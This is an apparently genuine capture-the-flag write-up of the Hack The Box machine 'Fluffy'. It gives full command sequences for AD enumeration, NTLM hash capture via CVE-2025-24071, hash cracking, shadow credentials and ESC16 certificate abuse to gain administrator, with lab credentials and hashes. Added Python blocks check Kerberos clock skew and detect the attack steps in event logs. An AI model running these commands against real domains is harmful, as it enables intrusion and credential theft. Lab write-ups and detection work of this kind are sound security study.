HTB-Fluffy


Full port scan:

rustscan -a 10.10.11.69 --range 1-65535 -- -sV
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.69:53
Open 10.10.11.69:88
Open 10.10.11.69:139
Open 10.10.11.69:389
Open 10.10.11.69:445
Open 10.10.11.69:464
Open 10.10.11.69:593
Open 10.10.11.69:636
Open 10.10.11.69:3268
Open 10.10.11.69:3269
Open 10.10.11.69:5985
Open 10.10.11.69:9389
Open 10.10.11.69:49667
Open 10.10.11.69:49678
Open 10.10.11.69:49681
Open 10.10.11.69:49695
Open 10.10.11.69:49701
Open 10.10.11.69:49677
Open 10.10.11.69:49738
[~] Starting Nmap
[>] The Nmap command to be run is nmap -sV -vvv -p 53,88,139,389,445,464,593,636,3268,3269,5985,9389,49667,49678,49681,49695,49701,49677,49738 10.10.11.69

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-24 22:15 -06
NSE: Loaded 46 scripts for scanning.
Initiating Ping Scan at 22:15
Scanning 10.10.11.69 [4 ports]
Completed Ping Scan at 22:15, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:15
Completed Parallel DNS resolution of 1 host. at 22:15, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:15
Scanning 10.10.11.69 [19 ports]
Discovered open port 139/tcp on 10.10.11.69
Discovered open port 53/tcp on 10.10.11.69
Discovered open port 445/tcp on 10.10.11.69
Discovered open port 88/tcp on 10.10.11.69
Discovered open port 49678/tcp on 10.10.11.69
Discovered open port 389/tcp on 10.10.11.69
Discovered open port 636/tcp on 10.10.11.69
Discovered open port 49701/tcp on 10.10.11.69
Discovered open port 49738/tcp on 10.10.11.69
Discovered open port 3268/tcp on 10.10.11.69
Discovered open port 49677/tcp on 10.10.11.69
Discovered open port 3269/tcp on 10.10.11.69
Discovered open port 49695/tcp on 10.10.11.69
Discovered open port 593/tcp on 10.10.11.69
Discovered open port 5985/tcp on 10.10.11.69
Discovered open port 9389/tcp on 10.10.11.69
Discovered open port 464/tcp on 10.10.11.69
Discovered open port 49681/tcp on 10.10.11.69
Discovered open port 49667/tcp on 10.10.11.69
Completed SYN Stealth Scan at 22:15, 0.55s elapsed (19 total ports)
Initiating Service scan at 22:15
Scanning 19 services on 10.10.11.69
Completed Service scan at 22:16, 58.08s elapsed (19 services on 1 host)
NSE: Script scanning 10.10.11.69.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 22:16
Completed NSE at 22:16, 1.27s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 22:16
Completed NSE at 22:16, 0.87s elapsed
Nmap scan report for 10.10.11.69
Host is up, received echo-reply ttl 127 (0.25s latency).
Scanned at 2025-05-24 22:15:47 -06 for 61s

PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-25 10:54:53Z)
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49681/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49695/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49701/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49738/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.86 seconds
Raw packets sent: 23 (988B) | Rcvd: 20 (864B)

We are given an initial username and password, so enumerate the users in the domain.

ldapsearch -x -H ldap://Fluffy.HTB -D "j.fleischman@Fluffy.htb" -w 'J0elTHEM4n1990!' -b "DC=Fluffy,DC=htb" "(objectClass=user)" sAMAccountName

Or alternatively:
crackmapexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --users

Next, collect a username wordlist.

The following command does this directly (RID brute-force, keeping only the user entries and stripping the domain prefix and the SID type):
nxc smb Fluffy.HTB -u 'j.fleischman' -p 'J0elTHEM4n1990!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt


Run the BloodHound collector and analyse the results.
bloodhound-python -u 'j.fleischman' -p 'J0elTHEM4n1990!' -d Fluffy.htb -dc dc01.Fluffy.htb -ns 10.10.11.69 -c all --zip


If the collector fails with a Kerberos error at this point, the cause is a clock mismatch between the VPN target and the Kali host (Kerberos rejects requests outside the KDC's clock-skew tolerance).

Domain time synchronisation

Synchronise with ntpdate:
ntpdate dc01.Fluffy.htb

Force synchronisation with chrony:
chronyd -q "server 10.10.11.69 iburst"

ntpdate was used here to align the time.


After synchronising, the error above no longer appears.
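The failure above is a clock-skew problem rather than a credential problem. The check below is an added example, not part of the original write-up: it parses an SNTP reply from the DC (10.10.11.69, the address used throughout this post), computes the offset against the local clock, and reports whether it exceeds the Windows KDC's default 5-minute tolerance. The sample reply used in the test is constructed.

```python
"""Kerberos clock-skew check (added example, not from the original write-up).

Kerberos rejects requests when client and KDC clocks differ by more than the
KDC's tolerance (5 minutes by default on Windows). This script parses an
(S)NTP v3/v4 server reply, computes the skew against the local clock and
reports whether authentication against the DC would fail for that reason.
"""
import socket
import struct
import time

NTP_EPOCH_DELTA = 2208988800   # seconds between 1900-01-01 and 1970-01-01
KERBEROS_MAX_SKEW = 300        # Windows KDC default MaxClockSkew: 5 minutes


def ntp_transmit_time(packet: bytes) -> float:
    """Return the server's Transmit Timestamp (bytes 40-47) as Unix time."""
    if len(packet) < 48:
        raise ValueError("short NTP packet")
    secs, frac = struct.unpack("!II", packet[40:48])
    return secs - NTP_EPOCH_DELTA + frac / 2**32


def clock_skew(packet: bytes, local_now: float) -> float:
    """Skew in seconds: positive when the local clock is ahead of the server."""
    return local_now - ntp_transmit_time(packet)


def kerberos_would_fail(skew: float, tolerance: float = KERBEROS_MAX_SKEW) -> bool:
    return abs(skew) > tolerance


def query_ntp(host: str, timeout: float = 3.0) -> bytes:
    """Send a minimal SNTP client request (LI=0, VN=4, Mode=3) to UDP/123."""
    request = b"\x23" + b"\x00" * 47
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(request, (host, 123))
        return s.recvfrom(48)[0]


def build_sample_reply(unix_time: float) -> bytes:
    """Constructed server reply (LI=0, VN=4, Mode=4) carrying unix_time as transmit timestamp."""
    secs = int(unix_time) + NTP_EPOCH_DELTA
    frac = int((unix_time - int(unix_time)) * 2**32)
    return b"\x24" + b"\x00" * 39 + struct.pack("!II", secs, frac)


if __name__ == "__main__":
    reply = query_ntp("10.10.11.69")   # the DC from this write-up
    skew = clock_skew(reply, time.time())
    print(f"skew {skew:+.1f}s -> Kerberos {'FAILS' if kerberos_would_fail(skew) else 'ok'}")
```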

SMB & CVE-2025-24071

Nothing useful was found in BloodHound, so the next step is to look at the SMB shares with the credentials we were given.

crackmapexec smb 10.10.11.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares


The IT share contains some files.


It holds an exploit for CVE-2025-24071, a PDF listing some CVEs the system is affected by, and a zip file containing the Everything tool.


Try exploiting CVE-2025-24071.

First craft a zip file, then upload it to the IT share; that is the only share that allows uploads.

Here the -i argument is the VPN IP address of our own machine.


Start an SMB share:
impacket-smbserver share ./share -smb2support

Then upload the generated zip file to the IT share with smbclient:
smbclient //10.10.11.69/IT -U 'j.fleischman%J0elTHEM4n1990!' -c "put exploit.zip"

At this point the NTLM hash (the NetNTLMv2 response) arrives at our SMB share.

Crack it with hashcat (mode 5600 is NetNTLMv2):
hashcat -m 5600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

This yields the password.

Shadow credentials

This account cannot log in over WinRM directly, so collect the domain information with BloodHound again:
bloodhound-python -u 'p.agila' -p 'prometheusx-303' -d Fluffy.htb -dc dc01.Fluffy.htb -ns 10.10.11.69 -c all --zip

The attack path is as follows:

The user P.AGILA belongs to the MANAGERS group, and MANAGERS has GenericAll over the SERVICE ACCOUNTS group, so P.AGILA can be added to SERVICE ACCOUNTS. SERVICE ACCOUNTS in turn has GenericWrite over three user accounts, so a shadow credentials attack can be used to take over winrm_svc.

First add P.AGILA to the SERVICE ACCOUNTS group:
net rpc group addmem "SERVICE ACCOUNTS" "p.agila" -U "FLUFFY.HTB"/"p.agila"%"prometheusx-303" -S "DC01.FLUFFY.HTB"

Then perform the shadow credentials attack:
certipy-ad shadow auto -username P.AGILA@fluffy.htb -password 'prometheusx-303' -account winrm_svc

The command above directly retrieves the NT hash of winrm_svc; note that the clock must be synchronised first.

evil-winrm -i 10.10.11.69 -u 'winrm_svc' -H '33bd09dcd697600edf6b3a7af4875767'

user.txt is on the Desktop.

ESC16

Privilege escalation:

If an account can modify certain key AD attributes of its own, and the certificate authority (CA) uses those attributes to determine the identity in the certificates it issues, then temporarily modifying those attributes can "trick" the CA into issuing a certificate that represents another user (such as an administrator). The UPN is one such key attribute.

Obtain the hash of ca_svc, then check which ADCS misconfigurations it can reach:
certipy-ad find -u ca_svc@fluffy.htb -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -stdout -vulnerable -dc-ip 10.10.11.69  # list vulnerable templates and CA settings

1. Change the UPN of ca_svc to administrator
certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn 'administrator' -user 'ca_svc' update

2. Request a certificate from the CA using the User template
certipy-ad req -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

3. Change the UPN back to ca_svc to restore the original state
certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip 10.10.11.69 -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update

4. Authenticate with the certificate to obtain the hash of the high-privilege user
certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain 'fluffy.htb' -dc-ip 10.10.11.69

Finally, log in with evil-winrm.
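From the defender's side, every step of the shadow credentials and ESC16 sections above leaves a Directory Service or group-membership audit event: the self-add to SERVICE ACCOUNTS, the msDS-KeyCredentialLink write to winrm_svc by another principal, and the UPN of ca_svc being rewritten to administrator. The detector below is an added example, not part of the original post; it assumes Windows Security events 5136 and 4728/4732/4756 have been exported to dicts with the fields shown, and the sample events are constructed to mirror this write-up's path.

```python
"""Detection for the ACL and ADCS abuses in this write-up (added example).

Events are modelled as dicts with the fields that Security events
5136 (directory object modified) and 4728/4732/4756 (member added to a
security group) carry; account and group names follow the write-up.
"""
from dataclasses import dataclass

PRIVILEGED = {"administrator", "domain admins", "enterprise admins"}
GROUP_ADD_EVENTS = {4728, 4732, 4756}   # global / local / universal security group


@dataclass
class Alert:
    rule: str
    actor: str
    target: str
    detail: str


def _norm(name: str) -> str:
    """Lower-case and strip 'DOMAIN\\' prefix or '@domain' suffix."""
    return name.lower().split("@")[0].split("\\")[-1]


def analyse(events: list[dict]) -> list[Alert]:
    alerts = []
    for ev in events:
        eid, actor, target = ev["id"], _norm(ev["subject"]), _norm(ev["object"])
        if eid == 5136 and ev["attribute"].lower() == "msds-keycredentiallink":
            # Shadow credentials: key written by someone other than the account itself
            if actor != target:
                alerts.append(Alert("shadow_credentials", actor, target,
                                    "msDS-KeyCredentialLink written by another principal"))
        elif eid == 5136 and ev["attribute"].lower() == "userprincipalname":
            new = _norm(ev["value"])
            # ESC16: UPN now names a different, privileged account
            if new != target and new in PRIVILEGED:
                alerts.append(Alert("esc16_upn_hijack", actor, target,
                                    f"UPN set to {ev['value']!r}"))
        elif eid in GROUP_ADD_EVENTS and actor == _norm(ev["member"]):
            alerts.append(Alert("self_group_add", actor, ev["object"],
                                "account added itself to a group"))
    return alerts


# Constructed sample events (object = target account name, value = new attribute value)
SAMPLE = [
    {"id": 4728, "subject": "FLUFFY\\p.agila", "object": "SERVICE ACCOUNTS", "member": "FLUFFY\\p.agila"},
    {"id": 5136, "subject": "FLUFFY\\p.agila", "object": "winrm_svc", "attribute": "msDS-KeyCredentialLink", "value": "B:828:<key-blob>"},
    {"id": 5136, "subject": "FLUFFY\\ca_svc", "object": "ca_svc", "attribute": "userPrincipalName", "value": "administrator"},
    {"id": 5136, "subject": "FLUFFY\\ca_svc", "object": "ca_svc", "attribute": "userPrincipalName", "value": "ca_svc@fluffy.htb"},
    {"id": 5136, "subject": "FLUFFY\\winrm_svc", "object": "winrm_svc", "attribute": "msDS-KeyCredentialLink", "value": "B:828:<key-blob>"},  # benign self-enrolment
]
```

The restore step (UPN set back to ca_svc@fluffy.htb) and a user enrolling their own key do not fire, so the three alerts on the sample are exactly the three attack steps.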


http://example.com/2025/05/25/HTB-Fluffy/
Author: FSRM
Published: 25 May 2025
Updated: 28 May 2025
License